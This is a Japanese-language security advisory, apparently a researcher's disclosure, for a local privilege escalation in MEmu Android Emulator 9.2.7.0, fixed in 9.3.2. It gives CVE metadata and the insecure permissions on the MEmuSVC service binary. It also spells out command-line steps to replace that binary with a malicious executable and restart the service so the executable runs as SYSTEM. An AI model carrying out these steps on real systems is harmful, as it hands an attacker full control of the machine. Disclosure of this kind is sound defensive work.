
CVE-2026-36213 | MEmu Android Emulator 9.2.7.0 における安全でないサービスバイナリのアクセス許可を介したローカル特権昇格 | 9.3.2で修正済み
CVE-2026-36213 | MEmu Android Emulator 9.2.7.0における不安定なサービスバイナリ権限を介したローカル特権昇格 | 9.3.2で修正済み
MEmu Android Emulator 9.2.7.0におけるローカル特権昇格(LPE)の脆弱性。
サービス MEmuSVC は NT AUTHORITY\SYSTEM として実行されますが、そのバイナリは任意のローカルユーザーが書き込み可能であり、完全なシステム侵害が可能です。
| フィールド | 詳細 |
|---|---|
| CVE | CVE-2026-36213 |
| 製品 | MEmu Android Emulator (MicroVirt) |
| 影響を受けるバージョン | 9.2.7.0以前 |
| 修正バージョン | 9.3.2 |
| CWE | CWE-732 / CWE-269 |
| CVSS v3.1 | 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK | T1574.010 |
MEmuService.exe は、不安定なNTFSパーミッションを持つSYSTEMレベルのWindowsサービスとしてインストールされています。
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) ← 任意のローカルユーザーがフルコントロール
Everyone:(F) ← 全ユーザー書き込み可能
:: ステップ1 - 脆弱な権限を確認
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
:: ステップ2 - バイナリを置き換える(低権限ユーザーとして)
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
:: ステップ3 - サービスを再起動
sc stop MEmuSVC && sc start MEmuSVC
:: 結果: malicious.exe が NT AUTHORITY\SYSTEM として実行される
入手先: https://github.com/sec-zone/Hijack-service-binaries
この研究は、責任ある開示ポリシーの下で教育目的で実施されました。
著者は、この情報の誤用に対して一切の責任を負いません。
名前: Mohammad Hossein Ashofte Yazdi
LinkedIn: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
メール: [email protected]